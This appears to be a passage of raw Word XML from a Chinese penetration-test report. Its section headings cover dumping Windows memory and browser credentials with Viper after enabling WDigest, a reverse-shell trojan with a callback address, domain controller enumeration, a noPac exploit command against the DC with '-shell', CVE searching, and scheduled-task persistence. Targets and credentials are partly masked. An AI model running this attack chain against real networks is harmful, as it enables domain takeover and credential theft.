            <wp:effectExtent l="0" t="0" r="13970" b="889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239" w:name="_Toc26814"/>
      <w:bookmarkStart w:id="240" w:name="_Toc17612"/>
      <w:bookmarkStart w:id="241" w:name="_Toc2705"/>
      <w:bookmarkStart w:id="242" w:name="_Toc31961"/>
      <w:bookmarkStart w:id="243" w:name="_Toc14283"/>
      <w:bookmarkStart w:id="244" w:name="_Toc7426"/>
      <w:bookmarkStart w:id="245" w:name="_Toc1083"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Viper凭证获取：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="239"/>
      <w:bookmarkEnd w:id="240"/>
      <w:bookmarkEnd w:id="241"/>
      <w:bookmarkEnd w:id="242"/>
      <w:bookmarkEnd w:id="243"/>
      <w:bookmarkEnd w:id="244"/>
      <w:bookmarkEnd w:id="245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46" w:name="_Toc27887"/>
      <w:bookmarkStart w:id="247" w:name="_Toc6943"/>
      <w:bookmarkStart w:id="248" w:name="_Toc19522"/>
      <w:bookmarkStart w:id="249" w:name="_Toc12510"/>
      <w:bookmarkStart w:id="250" w:name="_Toc31335"/>
      <w:bookmarkStart w:id="251" w:name="_Toc10867"/>
      <w:bookmarkStart w:id="252" w:name="_Toc13504"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启WDigest开关</w:t>
      </w:r>
      <w:bookmarkEnd w:id="246"/>
      <w:bookmarkEnd w:id="247"/>
      <w:bookmarkEnd w:id="248"/>
      <w:bookmarkEnd w:id="249"/>
      <w:bookmarkEnd w:id="250"/>
      <w:bookmarkEnd w:id="251"/>
      <w:bookmarkEnd w:id="252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70530" cy="1582420"/>
            <wp:effectExtent l="0" t="0" r="12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253" w:name="_Toc24038"/>
      <w:bookmarkStart w:id="254" w:name="_Toc5372"/>
      <w:bookmarkStart w:id="255" w:name="_Toc15920"/>
      <w:bookmarkStart w:id="256" w:name="_Toc19293"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="253"/>
      <w:bookmarkEnd w:id="254"/>
      <w:bookmarkEnd w:id="255"/>
      <w:bookmarkEnd w:id="25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06775" cy="681355"/>
            <wp:effectExtent l="0" t="0" r="6985" b="444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57" w:name="_Toc26085"/>
      <w:bookmarkStart w:id="258" w:name="_Toc9172"/>
      <w:bookmarkStart w:id="259" w:name="_Toc5558"/>
      <w:bookmarkStart w:id="260" w:name="_Toc1587"/>
      <w:bookmarkStart w:id="261" w:name="_Toc3488"/>
      <w:bookmarkStart w:id="262" w:name="_Toc12942"/>
      <w:bookmarkStart w:id="263" w:name="_Toc23941"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取windows内存密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="257"/>
      <w:bookmarkEnd w:id="258"/>
      <w:bookmarkEnd w:id="259"/>
      <w:bookmarkEnd w:id="260"/>
      <w:bookmarkEnd w:id="261"/>
      <w:bookmarkEnd w:id="262"/>
      <w:bookmarkEnd w:id="263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33520" cy="2195195"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1460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264" w:name="_Toc17291"/>
      <w:bookmarkStart w:id="265" w:name="_Toc21363"/>
      <w:bookmarkStart w:id="266" w:name="_Toc26986"/>
      <w:bookmarkStart w:id="267" w:name="_Toc31537"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：本机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="264"/>
      <w:bookmarkEnd w:id="265"/>
      <w:bookmarkEnd w:id="266"/>
      <w:bookmarkEnd w:id="26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495040" cy="1836420"/>
            <wp:effectExtent l="0" t="0" r="10160" b="7620"/>
            <wp:docPr id="128" name="图片 128" descr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268" w:name="_Toc1357"/>
      <w:bookmarkStart w:id="269" w:name="_Toc1457"/>
      <w:bookmarkStart w:id="270" w:name="_Toc6935"/>
      <w:bookmarkStart w:id="271" w:name="_Toc19780"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.xx.xx.50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End w:id="268"/>
      <w:bookmarkEnd w:id="269"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hxxxxdxxxxmxxx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="270"/>
      <w:bookmarkEnd w:id="271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515360" cy="875665"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8255"/>
            <wp:docPr id="129" name="图片 129" descr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域用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840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10.xx.xx.50</w:t>
            </w:r>
          </w:p>
        </w:tc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hxxxxdxxxxmxxx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840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52</w:t>
            </w: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*****</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>++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72" w:name="_Toc31695"/>
      <w:bookmarkStart w:id="273" w:name="_Toc3316"/>
      <w:bookmarkStart w:id="274" w:name="_Toc30458"/>
      <w:bookmarkStart w:id="275" w:name="_Toc4384"/>
      <w:bookmarkStart w:id="276" w:name="_Toc5047"/>
      <w:bookmarkStart w:id="277" w:name="_Toc10849"/>
      <w:bookmarkStart w:id="278" w:name="_Toc2363"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取浏览器密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="272"/>
      <w:bookmarkEnd w:id="273"/>
      <w:bookmarkEnd w:id="274"/>
      <w:bookmarkEnd w:id="275"/>
      <w:bookmarkEnd w:id="276"/>
      <w:bookmarkEnd w:id="277"/>
      <w:bookmarkEnd w:id="27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17035" cy="2189480"/>
            <wp:effectExtent l="0" t="0" r="4445" b="508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279" w:name="_Toc19630"/>
      <w:bookmarkStart w:id="280" w:name="_Toc1600"/>
      <w:bookmarkStart w:id="281" w:name="_Toc4233"/>
      <w:bookmarkStart w:id="282" w:name="_Toc21585"/>
      <w:bookmarkStart w:id="283" w:name="_Toc14362"/>
      <w:bookmarkStart w:id="284" w:name="_Toc23001"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反弹shell木马virustotal分析:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="279"/>
      <w:bookmarkEnd w:id="280"/>
      <w:bookmarkEnd w:id="281"/>
      <w:bookmarkEnd w:id="282"/>
      <w:bookmarkEnd w:id="283"/>
      <w:bookmarkEnd w:id="284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85" w:name="_Toc13348"/>
      <w:bookmarkStart w:id="286" w:name="_Toc11478"/>
      <w:bookmarkStart w:id="287" w:name="_Toc22270"/>
      <w:bookmarkStart w:id="288" w:name="_Toc27328"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>正确获得网络连接地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.167</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:6464</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
      <w:bookmarkEnd w:id="286"/>
      <w:bookmarkEnd w:id="287"/>
      <w:bookmarkEnd w:id="28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765" cy="2376805"/>
            <wp:effectExtent l="0" t="0" r="635" b="6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289" w:name="_Toc24350"/>
      <w:bookmarkStart w:id="290" w:name="_Toc1170"/>
      <w:bookmarkStart w:id="291" w:name="_Toc3263"/>
      <w:bookmarkStart w:id="292" w:name="_Toc31038"/>
      <w:bookmarkStart w:id="293" w:name="_Toc1061"/>
      <w:bookmarkStart w:id="294" w:name="_Toc12920"/>
      <w:bookmarkStart w:id="295" w:name="_Toc2180"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取域控信息：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="289"/>
      <w:bookmarkEnd w:id="290"/>
      <w:bookmarkEnd w:id="291"/>
      <w:bookmarkEnd w:id="292"/>
      <w:bookmarkEnd w:id="293"/>
      <w:bookmarkEnd w:id="294"/>
      <w:bookmarkEnd w:id="295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96" w:name="_Toc12061"/>
      <w:bookmarkStart w:id="297" w:name="_Toc15993"/>
      <w:bookmarkStart w:id="298" w:name="_Toc4591"/>
      <w:bookmarkStart w:id="299" w:name="_Toc12233"/>
      <w:bookmarkStart w:id="300" w:name="_Toc9207"/>
      <w:bookmarkStart w:id="301" w:name="_Toc4119"/>
      <w:bookmarkStart w:id="302" w:name="_Toc28698"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="296"/>
      <w:bookmarkEnd w:id="297"/>
      <w:bookmarkEnd w:id="298"/>
      <w:bookmarkEnd w:id="299"/>
      <w:bookmarkEnd w:id="300"/>
      <w:bookmarkEnd w:id="301"/>
      <w:bookmarkEnd w:id="30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70960" cy="2174240"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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03" w:name="_Toc6299"/>
      <w:bookmarkStart w:id="304" w:name="_Toc18977"/>
      <w:bookmarkStart w:id="305" w:name="_Toc32508"/>
      <w:bookmarkStart w:id="306" w:name="_Toc3506"/>
      <w:bookmarkStart w:id="307" w:name="_Toc7350"/>
      <w:bookmarkStart w:id="308" w:name="_Toc2819"/>
      <w:bookmarkStart w:id="309" w:name="_Toc29461"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="303"/>
      <w:bookmarkEnd w:id="304"/>
      <w:bookmarkEnd w:id="305"/>
      <w:bookmarkEnd w:id="306"/>
      <w:bookmarkEnd w:id="307"/>
      <w:bookmarkEnd w:id="308"/>
      <w:bookmarkEnd w:id="309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790950" cy="1288415"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="130" name="图片 130" descr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4"/>
        <w:gridCol w:w="3259"/>
        <w:gridCol w:w="1384"/>
        <w:gridCol w:w="2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域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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域控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域林</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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RidOwner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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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WIN-C*****SSF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WIN-GS2*****UGC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WIN-370****AQ7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DC**19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DC**19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02.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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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WIN-C*****SSF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s**.c**.c**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10" w:name="_Toc5332"/>
      <w:bookmarkStart w:id="311" w:name="_Toc30562"/>
      <w:bookmarkStart w:id="312" w:name="_Toc27541"/>
      <w:bookmarkStart w:id="313" w:name="_Toc16542"/>
      <w:bookmarkStart w:id="314" w:name="_Toc10993"/>
      <w:bookmarkStart w:id="315" w:name="_Toc3403"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ping主机名获得域名ip</w:t>
      </w:r>
      <w:bookmarkEnd w:id="310"/>
      <w:bookmarkEnd w:id="311"/>
      <w:bookmarkEnd w:id="312"/>
      <w:bookmarkEnd w:id="313"/>
      <w:bookmarkEnd w:id="314"/>
      <w:bookmarkEnd w:id="315"/>
    </w:p>
    <w:p>
      <w:pPr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Ping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WIN-C*****SSF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483610" cy="1534795"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="131" name="图片 131" descr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Ping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WIN-GS2*****UGC.s**.c**.c**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998595" cy="874395"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="132" name="图片 132" descr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域控名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WIN-C*****SSF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WIN-GS2*****UGC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WIN-370****AQ7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DC**19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DC**19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02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10.*.*.90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316" w:name="_Toc4968"/>
      <w:bookmarkStart w:id="317" w:name="_Toc29898"/>
      <w:bookmarkStart w:id="318" w:name="_Toc25789"/>
      <w:bookmarkStart w:id="319" w:name="_Toc6197"/>
      <w:bookmarkStart w:id="320" w:name="_Toc12754"/>
      <w:bookmarkStart w:id="321" w:name="_Toc9224"/>
      <w:bookmarkStart w:id="322" w:name="_Toc12670"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>尝试nopac漏洞攻击域控</w:t>
      </w:r>
      <w:bookmarkEnd w:id="316"/>
      <w:bookmarkEnd w:id="317"/>
      <w:bookmarkEnd w:id="318"/>
      <w:bookmarkEnd w:id="319"/>
      <w:bookmarkEnd w:id="320"/>
      <w:bookmarkEnd w:id="321"/>
      <w:bookmarkEnd w:id="322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23" w:name="_Toc17482"/>
      <w:bookmarkStart w:id="324" w:name="_Toc9736"/>
      <w:bookmarkStart w:id="325" w:name="_Toc9129"/>
      <w:bookmarkStart w:id="326" w:name="_Toc13341"/>
      <w:bookmarkStart w:id="327" w:name="_Toc25022"/>
      <w:bookmarkStart w:id="328" w:name="_Toc3388"/>
      <w:bookmarkStart w:id="329" w:name="_Toc6087"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安装pip</w:t>
      </w:r>
      <w:bookmarkEnd w:id="323"/>
      <w:bookmarkEnd w:id="324"/>
      <w:bookmarkEnd w:id="325"/>
      <w:bookmarkEnd w:id="326"/>
      <w:bookmarkEnd w:id="327"/>
      <w:bookmarkEnd w:id="328"/>
      <w:bookmarkEnd w:id="329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9900" cy="2420620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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30" w:name="_Toc18221"/>
      <w:bookmarkStart w:id="331" w:name="_Toc21752"/>
      <w:bookmarkStart w:id="332" w:name="_Toc16501"/>
      <w:bookmarkStart w:id="333" w:name="_Toc15566"/>
      <w:bookmarkStart w:id="334" w:name="_Toc7010"/>
      <w:bookmarkStart w:id="335" w:name="_Toc17933"/>
      <w:bookmarkStart w:id="336" w:name="_Toc10864"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安装依赖</w:t>
      </w:r>
      <w:bookmarkEnd w:id="330"/>
      <w:bookmarkEnd w:id="331"/>
      <w:bookmarkEnd w:id="332"/>
      <w:bookmarkEnd w:id="333"/>
      <w:bookmarkEnd w:id="334"/>
      <w:bookmarkEnd w:id="335"/>
      <w:bookmarkEnd w:id="33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77385" cy="2372360"/>
            <wp:effectExtent l="0" t="0" r="3175" b="508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37" w:name="_Toc13567"/>
      <w:bookmarkStart w:id="338" w:name="_Toc6323"/>
      <w:bookmarkStart w:id="339" w:name="_Toc8070"/>
      <w:bookmarkStart w:id="340" w:name="_Toc218"/>
      <w:bookmarkStart w:id="341" w:name="_Toc32570"/>
      <w:bookmarkStart w:id="342" w:name="_Toc20937"/>
      <w:bookmarkStart w:id="343" w:name="_Toc32105"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开始攻击：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="337"/>
      <w:bookmarkEnd w:id="338"/>
      <w:bookmarkEnd w:id="339"/>
      <w:bookmarkEnd w:id="340"/>
      <w:bookmarkEnd w:id="341"/>
      <w:bookmarkEnd w:id="342"/>
      <w:bookmarkEnd w:id="343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344" w:name="_Toc27706"/>
      <w:bookmarkStart w:id="345" w:name="_Toc1571"/>
      <w:bookmarkStart w:id="346" w:name="_Toc23949"/>
      <w:bookmarkStart w:id="347" w:name="_Toc5014"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Nopac工具链接：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="344"/>
      <w:bookmarkEnd w:id="345"/>
      <w:bookmarkEnd w:id="346"/>
      <w:bookmarkEnd w:id="347"/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https://github.com/Ridter/noPac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348" w:name="_Toc556"/>
      <w:bookmarkStart w:id="349" w:name="_Toc7666"/>
      <w:bookmarkStart w:id="350" w:name="_Toc7087"/>
      <w:bookmarkStart w:id="351" w:name="_Toc1475"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击命令：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="348"/>
      <w:bookmarkEnd w:id="349"/>
      <w:bookmarkEnd w:id="350"/>
      <w:bookmarkEnd w:id="351"/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python3 noPac.py  -use-ldap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s**.c**.c**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hxxxxdxxxxmxxx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52N****++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-dc-ip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10.*.*.12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 -shell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903980" cy="2411095"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12065"/>
            <wp:docPr id="133" name="图片 133" descr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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="352" w:name="_Toc14420"/>
      <w:bookmarkStart w:id="353" w:name="_Toc19302"/>
      <w:bookmarkStart w:id="354" w:name="_Toc10130"/>
      <w:bookmarkStart w:id="355" w:name="_Toc16885"/>
      <w:bookmarkStart w:id="356" w:name="_Toc14098"/>
      <w:bookmarkStart w:id="357" w:name="_Toc6067"/>
      <w:bookmarkStart w:id="358" w:name="_Toc10288"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>搜索可利用CVE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="352"/>
      <w:bookmarkEnd w:id="353"/>
      <w:bookmarkEnd w:id="354"/>
      <w:bookmarkEnd w:id="355"/>
      <w:bookmarkEnd w:id="356"/>
      <w:bookmarkEnd w:id="357"/>
      <w:bookmarkEnd w:id="35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模块通过内存执行powershell脚本查看系统版本信息及补丁信息,与数据库中的数据对比,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>筛选</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>系统可能受那些CVE漏洞影响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31030" cy="2136140"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270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359" w:name="_Toc2588"/>
      <w:bookmarkStart w:id="360" w:name="_Toc29788"/>
      <w:bookmarkStart w:id="361" w:name="_Toc5246"/>
      <w:bookmarkStart w:id="362" w:name="_Toc32359"/>
      <w:bookmarkStart w:id="363" w:name="_Toc17957"/>
      <w:bookmarkStart w:id="364" w:name="_Toc8697"/>
      <w:bookmarkStart w:id="365" w:name="_Toc21967"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.xx.xx.64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">:8080 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="359"/>
      <w:bookmarkEnd w:id="360"/>
      <w:bookmarkEnd w:id="361"/>
      <w:bookmarkEnd w:id="362"/>
      <w:bookmarkEnd w:id="363"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>dxxxxsxxxbxxx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="364"/>
      <w:bookmarkEnd w:id="365"/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66" w:name="_Toc6207"/>
      <w:bookmarkStart w:id="367" w:name="_Toc7899"/>
      <w:bookmarkStart w:id="368" w:name="_Toc12491"/>
      <w:bookmarkStart w:id="369" w:name="_Toc23052"/>
      <w:bookmarkStart w:id="370" w:name="_Toc3157"/>
      <w:bookmarkStart w:id="371" w:name="_Toc8082"/>
      <w:bookmarkStart w:id="372" w:name="_Toc23616"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计划任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="366"/>
      <w:bookmarkEnd w:id="367"/>
      <w:bookmarkEnd w:id="368"/>
      <w:bookmarkEnd w:id="369"/>
      <w:bookmarkEnd w:id="370"/>
      <w:bookmarkEnd w:id="371"/>
      <w:bookmarkEnd w:id="372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373" w:name="_Toc1534"/>
      <w:bookmarkStart w:id="374" w:name="_Toc20385"/>
      <w:bookmarkStart w:id="375" w:name="_Toc8856"/>
      <w:bookmarkStart w:id="376" w:name="_Toc685"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:bookmarkEnd w:id="373"/>
      <w:bookmarkEnd w:id="374"/>
      <w:bookmarkEnd w:id="375"/>
      <w:bookmarkEnd w:id="37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36770" cy="2002155"/>
            <wp:effectExtent l="0" t="0" r="11430" b="952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377" w:name="_Toc32650"/>
      <w:bookmarkStart w:id="378" w:name="_Toc19581"/>
      <w:bookmarkStart w:id="379" w:name="_Toc563"/>
      <w:bookmarkStart w:id="380" w:name="_Toc19738"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:bookmarkEnd w:id="377"/>
      <w:bookmarkEnd w:id="378"/>
      <w:bookmarkEnd w:id="379"/>
      <w:bookmarkEnd w:id="380"/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17570" cy="2837180"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1270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t>2022</w:t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81" w:name="_Toc15716"/>
      <w:bookmarkStart w:id="382" w:name="_Toc15512"/>
      <w:bookmarkStart w:id="383" w:name="_Toc1405"/>
      <w:bookmarkStart w:id="384" w:name="_Toc2837"/>
      <w:bookmarkStart w:id="385" w:name="_Toc28672"/>
      <w:bookmarkStart w:id="386" w:name="_Toc11692"/>
      <w:bookmarkStart w:id="387" w:name="_Toc18491"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>浏览器凭证：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="381"/>
      <w:bookmarkEnd w:id="382"/>
      <w:bookmarkEnd w:id="383"/>
      <w:bookmarkEnd w:id="384"/>
      <w:bookmarkEnd w:id="385"/>
      <w:bookmarkEnd w:id="386"/>
      <w:bookmarkEnd w:id="38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10255" cy="2580640"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1016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388" w:name="_Toc7358"/>
      <w:bookmarkStart w:id="389" w:name="_Toc16128"/>
      <w:bookmarkStart w:id="390" w:name="_Toc13825"/>
      <w:bookmarkStart w:id="391" w:name="_Toc16883"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="388"/>
      <w:bookmarkEnd w:id="389"/>
      <w:bookmarkEnd w:id="390"/>
      <w:bookmarkEnd w:id="391"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>[URL] -&gt; https://x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>.p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>*****</w:t>
